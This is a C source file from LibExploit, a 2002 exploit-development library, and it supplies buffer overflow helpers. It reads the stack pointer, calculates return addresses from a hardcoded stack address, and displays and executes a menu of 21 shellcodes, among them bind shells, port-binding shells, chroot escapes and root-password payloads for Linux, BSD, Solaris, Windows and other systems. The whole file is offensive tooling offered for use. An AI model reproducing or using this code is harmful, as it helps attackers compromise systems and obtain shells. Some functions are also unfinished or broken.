/* LibExploit
 *
 * FILENAME : buffer.c
 * DATE     : 11/08/2002
 * CODER    : Simon Roses Femerling
 * ABSTRACT : Buffer overflow functions file.
 *
*/

#include "../include/LibExploit.h"
#include "../include/shellcodes.h"

/*************************************************************
* Functions
*************************************************************/

/*
 * FUNCTION : unsigned long LibExploit_Getesp
 * PARAMS   : ...
 * ABSTRACT : Get ESP on system. 
*/
unsigned long LibExploit_Getesp() {
//	#ifdef X86
		__asm__("movl %esp, %eax");
//	#else
//		__asm__("mov %sp, %i0 \n");		
//	#endif
}

/*
 * FUNCTION : void LibExploit_InfoShell
 * PARAMS   : char *shell
 * ABSTRACT : Display a shell info on screen.
*/
void LibExploit_InfoShell(int numshell) {
	int i;
	char *shl;

	if((numshell < 1) || (numshell > TOTALSHELL)) {
		printf("Error : no shell with number : %d\n",numshell);
	} else {
		printf("\nNumber : %d\n",numshell);
		printf("OS : %s\n",LibExploit_GiveOsShell(numshell));
		printf("Platform : %s\n",LibExploit_GivePlatformShell(numshell));
		printf("Type : %s\n",LibExploit_GiveTypeShell(numshell));	
		printf("Name : %s\n",LibExploit_GiveNameShell(numshell));
		printf("Size : %d\n",LibExploit_GiveSizeShell(numshell));
		shl = LibExploit_GiveHexShell(numshell);
		printf("Shell :\n");
		LibExploit_DisplayShell(shl,strlen(shl));
	}
}

/*
 * FUNCTION : void LibExploit_Runshell
 * PARAMS   : char *shell
 * ABSTRACT : Run a shell for testing.
*/
void LibExploit_Runshell(int numshell) {
	int (*func)();

	if((numshell < 1) || (numshell > TOTALSHELL)) {
		printf("Error : no shell with number : %d\n",numshell);
	} else {
		printf("\nRunning shellcode...\n");
		func = (int (*)()) LibExploit_GiveHexShell(numshell);	
		(int)(func)();
	}
}

/*
 * FUNCTION : char *LibExploit_GiveHexShell
 * PARAMS   : int numshell
 * ABSTRACT : Return the shellcode itself.
*/
char *LibExploit_GiveHexShell(int numshell) {

	// Very poor. Must be optimized.
	if(numshell == 1) {
		return Linux_x86_Binsh;
	}
	else if(numshell == 2) {
		return Linux_x86_PortBinding;
	}
	else if(numshell == 3) {
		return Linux_x86_Chroot;
	}
	else if(numshell == 4) {
		return Linux_x86_TolowerShell;
	}
	else if(numshell == 5) {
		return Linux_x86_ToupperShell;
	}
	else if(numshell == 6) {
		return FreeBSD_x86_Binsh;
	}
	else if(numshell == 7) {
		return BSDi_x86_Binsh;
	}
	else if(numshell == 8) {
		return BSDi_x86_ToupperShell;
	}
	else if(numshell == 9) {
		return HPUX_Binsh;
	}
	else if(numshell == 10) {
		return UnixWare_Binsh;
	}
	else if(numshell == 11) {
		return Solaris_x86_Binsh;
	}	
	else if(numshell == 12) {
		return Linux_Sparc_Binsh;
	}	
	else if(numshell == 13) {
		return Linux_Sparc_TolowerShell;
	}	
	else if(numshell == 14) {
		return Solaris_Sparc_Binsh;
	}	
	else if(numshell == 15) {
		return NetBSD_x86_Binsh;
	}	
	else if(numshell == 16) {
		return Windows_x86_PortBinding;
	}	
	else if(numshell == 17) {
		return Irix_MIPS_Binsh;
	}	
	else if(numshell == 18) {
		return Linux_x86_RootPass;
	}	
	else if(numshell == 19) {
		return OpenBSD_x86_RootPass;
	}	
	else if(numshell == 20) {
		return SCO_Binsh;
	}	
	else if(numshell == 21) {
		return SCO_Chroot;
	}	
	else {	
		return NULL;
	}
}

/*
 * FUNCTION : char *LibExploit_GiveSizeShell
 * PARAMS   : int numshell
 * ABSTRACT : Return the shellcode size.
*/
int LibExploit_GiveSizeShell(int numshell) {
	int i; 

	if((numshell < 1) || (numshell > TOTALSHELL)) {
		return -1;		
	}	
	
	for(i = 0; i < TOTALSHELL; i++) {
		if(ShellCodes[i].num == numshell) {
			return ShellCodes[i].size;
		}
	}
}

/*
 * FUNCTION : char *LibExploit_GiveNameShell
 * PARAMS   : int numshell
 * ABSTRACT : Return the shellcode Name.
*/
char *LibExploit_GiveNameShell(int numshell) {
	int i; 

	if((numshell < 1) || (numshell > TOTALSHELL)) {
		return NULL;		
	}	
	
	for(i = 0; i < TOTALSHELL; i++) {
		if(ShellCodes[i].num == numshell) {
			return ShellCodes[i].name;
		}
	}
}

/*
 * FUNCTION : char *LibExploit_GiveOsShell
 * PARAMS   : int numshell
 * ABSTRACT : Return the shellcode OS.
*/
char *LibExploit_GiveOsShell(int numshell) {
	int i; 
	
	if((numshell < 1) || (numshell > TOTALSHELL)) {
		return NULL;		
	}	

	for(i = 0; i < TOTALSHELL; i++) {
		if(ShellCodes[i].num == numshell) {
			return ShellCodes[i].os;
		}
	}
}

/*
 * FUNCTION : char *LibExploit_GiveTypeShell
 * PARAMS   : int numshell
 * ABSTRACT : Return the shellcode Type.
*/
char *LibExploit_GiveTypeShell(int numshell) {
	int i; 

	if((numshell < 1) || (numshell > TOTALSHELL)) {
		return NULL;		
	}	
	
	for(i = 0; i < TOTALSHELL; i++) {
		if(ShellCodes[i].num == numshell) {
			return ShellCodes[i].type;
		}
	}
}

/*
 * FUNCTION : char *LibExploit_GiveTypeShell
 * PARAMS   : int numshell
 * ABSTRACT : Return the shellcode Type.
*/
char *LibExploit_GivePlatformShell(int numshell) {
	int i; 

	if((numshell < 1) || (numshell > TOTALSHELL)) {
		return NULL;		
	}	
	
	for(i = 0; i < TOTALSHELL; i++) {
		if(ShellCodes[i].num == numshell) {
			return ShellCodes[i].platform;
		}
	}	
}

/*
 * FUNCTION : int LibExploit_Calculateret
 * PARAMS   : char *shell, char *path 
 * ABSTRACT : Calculate the return address.
*/
int LibExploit_Calculateret(char *shell, char *path) {
	int ret;

	ret = 0xbffffffa - strlen(shell) - strlen(path);

return ret;
}

/*
 * FUNCTION : int LibExploit_DisplayShell
 * PARAMS   : char  *shell, int len
 * ABSTRACT : Display on screen a shellcode in hex.
*/
void LibExploit_DisplayShell(char *shell, int len) {
	int i;	

	for(i = 0; i < len; i++)
		printf("\\x%2.2x",shell[i] & 0x000000ff);
	printf("\n");
}

/*
 * FUNCTION : int LibExploit_CheckShell
 * PARAMS   : char  *shell, int len
 * ABSTRACT : Check that shellcode do not contain a null char.
*/
int LibExploit_CheckShell(char shell[]) {
/*
	char nulls[sizeof(shell)-1];
	register int i;
	register int nullcount=0;	

	memset(nulls, 0, sizeof(nulls));
	for(i = 0; i < sizeof(shell)-1; i++) {
		if(!shell[i]) {
			nullcount++;
			nulls[i] = 1;	
		}
	}

return(nullcount);
*/
}

/* SRF E0F */
